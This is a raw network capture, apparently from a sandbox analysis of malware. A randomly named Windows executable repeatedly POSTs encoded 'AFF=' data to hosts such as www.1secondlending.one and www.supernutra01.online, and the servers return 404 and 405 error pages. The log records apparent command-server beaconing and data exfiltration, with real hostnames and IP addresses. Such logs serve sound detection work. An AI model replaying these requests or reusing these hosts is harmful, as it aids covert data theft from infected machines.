                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 55 6f 62 31 79 71 61 63 77 48 52 51 4e 7a 78 69 46 56 76 62 69 76 39 2f 53 2f 72 47 4d 61 4d 67 6f 70 41 52 4c 65 75 6a 7a 50 69 6d 6f 4d 57 6b 72 53 7a 77 4d 41 75 39 32 55 4a 41 67 49 76 37 45 4a 4d 50 54 6a 76 47 47 59 57 76 61 66 47 2b 6c 79 6b 38 63 34 36 70 5a 48 41 71 33 42 65 6c 62 69 67 74 72 45 5a 76 45 69 73 49 66 38 47 4d 6c 58 46 51 43 56 72 67 58 6c 49 61 71 59 6b 47 38 51 67 6e 74 6b 41 53 72 76 79 51 67 4d 6a 4f 34 37 6b 71 6c 70 4b 4b 71 4d 66 50 4a 2b 66 45 42 6b 53 6d 41 65 57 41 6e 36 47 5a 67 3d
                                                Data Ascii: AFF=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAiUob1yqacwHRQNzxiFVvbiv9/S/rGMaMgopARLeujzPimoMWkrSzwMAu92UJAgIv7EJMPTjvGGYWvafG+lyk8c46pZHAq3BelbigtrEZvEisIf8GMlXFQCVrgXlIaqYkG8QgntkASrvyQgMjO47kqlpKKqMfPJ+fEBkSmAeWAn6GZg=
                                                Nov 22, 2024 12:42:34.668154001 CET691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:34 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.44982143.205.198.29804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:35.754379034 CET10827OUTPOST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 70 78 38 68 35 53 77 2f 4e 68 77 56 4e 68 70 4b 51 32 54 4a 50 78 31 6e 73 33 67 4f 41 69 63 6f 62 41 75 71 61 37 73 48 51 51 4e 7a 79 69 46 51 76 62 69 2b 39 2f 4b 37 72 47 51 56 4d 6d 73 70 42 79 54 65 73 53 7a 50 6f 6d 6f 4d 4b 55 72 52 73 41 4d 76 75 39 6d 71 4a 44 49 49 76 37 45 4a 4d 4f 6a 6a 76 54 79 59 51 76 61 63 51 75 6c 45 67 38 63 63 36 70 77 77 41 71 37 72 65 52 76 69 67 4e 62 45 63 64 63 69 77 59 65 61 4c 73 6c 50 46 51 65 4b 72 6d 7a 70 49 61 76 4e 6b 47 49 51 6c 51 63 39 48 7a 6e 48 70 44 6f 57 38 74 6b 6a 6c 39 4a 71 55 4a 75 34 5a 74 70 59 41 33 6b 54 58 57 4a 4a 4b 69 66 37 5a 75 73 73 79 4f 4e 5a 68 55 64 4b 41 73 61 4b 56 73 4c 47 64 6e 6c 76 48 43 7a 48 7a 67 31 4b 4c 62 6d 4e 36 36 43 4e 6a 57 75 50 54 6a 32 71 66 37 76 45 41 6f 32 76 51 66 4b 7a 63 50 34 36 46 4a 43 47 53 53 71 61 70 75 4f 42 6d 44 77 70 75 79 54 39 4d 78 73 6c 2b 7a 64 35 45 56 32 57 57 4e 68 53 76 56 65 62 79 57 32 30 6a 72 4a 53 38 4b 38 49 4a 72 30 33 63 77 [TRUNCATED]
                                                Data Ascii: AFF=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAicobAuqa7sHQQNzyiFQvbi+9/K7rGQVMmspByTesSzPomoMKUrRsAMvu9mqJDIIv7EJMOjjvTyYQvacQulEg8cc6pwwAq7reRvigNbEcdciwYeaLslPFQeKrmzpIavNkGIQlQc9HznHpDoW8tkjl9JqUJu4ZtpYA3kTXWJJKif7ZussyONZhUdKAsaKVsLGdnlvHCzHzg1KLbmN66CNjWuPTj2qf7vEAo2vQfKzcP46FJCGSSqapuOBmDwpuyT9Mxsl+zd5EV2WWNhSvVebyW20jrJS8K8IJr03cwTusHfKNK+b8NMbZvyo3kJ7qyg4qk5pOBS3wF2hzetT3DqGjSwHOxQDAh41gwQTtFE6iL3+QBWCXrHTetjavPTS4b8WOvA8lBef6FvEGLF5KVlalTkTH2RDNcEJ9II/qHxFP9Xgl9FtHCOhVSCDmDdC3x1insdBhN4JEGcc6ZyV9Ur80Ip1HFrferfNz7tHsCDdzXPyMXZkU3xBSc+WExyA9w2868FNMMSKIbsIuiKxBbWgrKj6vmJlCiAt+dtvGaIvPujJCw+YyDeSEfbyKSRqvg0tAJDlm021EPXgPP/MufnQeYGa3U98YwEJ0Ku903b7phL9CZwzRCO8WTyH/49PnKY7Jap7KV+rzx9pPDLccggEyDcinMy6Orou26ahDDGNYYYY1ceuKulebTOsshiBexq6vRfiL6Dcs4QarXRxbOX5ecYhgKhSwIOTeVDJG159BPC6MPU/r2VMJw/nZ2l0bp6yGChriZe4z0obdNwsvxRMrodJjiYgc2V5t+5Y+Kj2ROjJtHInCr+5+XyKtYrfSlnEy+XRcYpgcDYbwx5rYhFjiKbozvFnuyrg/mLxKwXzIEV37cpMz24emmehF1lDdyotCeqXRo+czPHDwRkmJSzdtYp/+QnkS5R9WhTQ8+DpDQNnC7PR6Et+Fy9Ce0kbSCOKEj/yQQpt [TRUNCATED]
                                                Nov 22, 2024 12:42:37.269301891 CET691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:37 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.44982743.205.198.29804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:38.404337883 CET453OUTGET /6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Nov 22, 2024 12:42:39.874555111 CET691INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:39 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449843172.67.220.36804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:45.372070074 CET728OUTPOST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 31 4c 32 50 35 58 56 74 76 35 41 79 46 35 50 6e 72 62 43 54 6c 58 44 4c 36 6e 5a 47 4d 74 74 6f 45 73 39 75 79 4f 47 74 48 4f 59 70 6c 34 44 41 6a 7a 36 53 53 49 2f 69 58 42 75 30 71 41 71 2b 70 47 5a 57 2b 57 34 70 39 6e 63 50 42 62 62 64 37 35 51 49 51 6d 52 52 34 68 69 41 2f 6c 6c 7a 49 69 47 4b 2b 6c 4a 5a 4b 69 67 30 48 4f 49 76 46 36 34 6b 2f 4e 6e 36 69 4c 6d 73 5a 6c 44 35 47 4f 31 7a 33 48 37 69 66 74 53 31 44 71 33 4c 6e 57 74 36 45 53 75 55 6d 42 50 62 68 4f 6e 44 72 73 67 72 48 48 70 4a 44 63 4c 53 2b 66 73 53 41 38 46 51 58 75 56 4d 6f 68 53 71 33 51 69 6e 77 67 3d 3d
                                                Data Ascii: AFF=1L2P5XVtv5AyF5PnrbCTlXDL6nZGMttoEs9uyOGtHOYpl4DAjz6SSI/iXBu0qAq+pGZW+W4p9ncPBbbd75QIQmRR4hiA/llzIiGK+lJZKig0HOIvF64k/Nn6iLmsZlD5GO1z3H7iftS1Dq3LnWt6ESuUmBPbhOnDrsgrHHpJDcLS+fsSA8FQXuVMohSq3Qinwg==
                                                Nov 22, 2024 12:42:46.715147018 CET1236INHTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81ycgb2%2BG4%2F%2B5M0pOmCcjWUgI3McX8MJv1HTOinV6hqPg0q6ITGDCzP5ZalXtycOWJ3lqCoqQAEHrRjoQSz2eAElOdFovxJ07jZkVugLSwnXlEw7N4MP9b6l7RN0v%2BvwbG0FUrBrsAWR0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a87378d8c3f0-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=728&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                Nov 22, 2024 12:42:46.715178013 CET91INData Raw: 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67
                                                Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Nov 22, 2024 12:42:46.715779066 CET5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.449850172.67.220.36804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:48.032150030 CET748OUTPOST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 41 70 6c 64 2f 41 69 79 36 53 52 49 2f 69 66 68 75 74 30 77 71 44 70 47 64 65 2b 53 34 70 39 6a 30 50 42 66 58 64 37 4b 34 58 42 6d 52 66 78 42 69 56 69 56 6c 7a 49 69 47 4b 2b 6a 6c 2f 4b 69 6f 30 47 2b 34 76 58 76 59 6c 6a 64 6e 35 31 37 6d 73 64 6c 44 39 47 4f 31 56 33 46 65 48 66 75 71 31 44 76 4c 4c 70 6a 42 35 4c 53 75 53 37 78 4f 2f 78 63 6e 4c 68 4f 31 7a 49 42 78 72 45 2b 54 58 32 35 68 49 52 4e 6b 48 46 75 78 2f 31 6d 62 65 36 54 66 75 72 6b 72 61 73 32 6f 47 72 55 69 49 65 41 72 4f 59 4b 4c 65 46 58 77 3d
                                                Data Ascii: AFF=1L2P5XVtv5AyEZ/nt6CTg3DIm3ZGCNtsEsxuyLi9H4Apld/Aiy6SRI/ifhut0wqDpGde+S4p9j0PBfXd7K4XBmRfxBiViVlzIiGK+jl/Kio0G+4vXvYljdn517msdlD9GO1V3FeHfuq1DvLLpjB5LSuS7xO/xcnLhO1zIBxrE+TX25hIRNkHFux/1mbe6Tfurkras2oGrUiIeArOYKLeFXw=
                                                Nov 22, 2024 12:42:49.383327007 CET1236INHTTP/1.1 405 Not Allowed
                                                Date: Fri, 22 Nov 2024 11:42:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYWvK%2Fj1EzZ2vv0eoDQjGxnGP%2FFg3Lc6VeGqNcTApnTaornKmGV00%2F%2FrH3QA%2BTLZvm0X9HAIGuqY4x%2FcOHM74I8zdY7kjCSDzIFoyBUOjiR%2FbW%2Bk3KQrTsEHUMFHSp5q4%2FWnlU17QgxHXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e68a8843b2a428f-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and C
                                                Nov 22, 2024 12:42:49.383393049 CET105INData Raw: 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20
                                                Data Ascii: hrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.449859172.67.220.36804548C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 22, 2024 12:42:50.814327955 CET10830OUTPOST /rk61/ HTTP/1.1
                                                Host: www.supernutra01.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.supernutra01.online
                                                Referer: http://www.supernutra01.online/rk61/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Raw: 41 46 46 3d 31 4c 32 50 35 58 56 74 76 35 41 79 45 5a 2f 6e 74 36 43 54 67 33 44 49 6d 33 5a 47 43 4e 74 73 45 73 78 75 79 4c 69 39 48 34 49 70 6c 76 6e 41 6a 52 69 53 51 49 2f 69 56 42 75 77 30 77 71 53 70 47 6c 61 2b 53 39 53 39 6c 77 50 43 36 4c 64 39 37 34 58 49 6d 52 66 38 68 6a 79 2f 6c 6c 6d 49 69 57 4f 2b 6a 56 2f 4b 69 6f 30 47 39 67 76 48 4b 34 6c 68 64 6e 36 69 4c 6d 6f 5a 6c 44 5a 47 4f 74 72 33 46 62 79 44 4f 4b 31 44 50 37 4c 6c 78 35 35 47 53 75 51 72 68 4f 6e 78 63 71 56 68 4f 70 2f 49 42 74 52 45 38 50 58 31 4f 56 55 4e 5a 6f 65 65 34 68 56 6e 68 72 57 33 69 4c 31 71 32 37 32 68 44 4d 48 35 33 43 4c 64 53 32 56 63 37 6e 6b 62 58 30 75 45 79 35 56 52 52 66 48 2b 54 53 53 31 4c 35 6d 69 42 36 6c 4d 4a 38 2b 79 35 34 46 2b 4e 46 32 73 45 6d 56 7a 42 2b 65 4a 72 64 68 66 38 62 63 74 48 68 35 63 6e 66 55 59 2b 71 7a 31 4e 6b 37 39 49 69 37 47 6d 42 42 55 64 49 55 74 4b 42 51 58 77 35 52 75 39 71 32 65 39 52 66 4d 4c 6c 61 34 59 48 69 35 52 2b 4c 69 6a 2b 33 66 41 5a 7a 2f 6b 68 6d 78 69 [TRUNCATED]
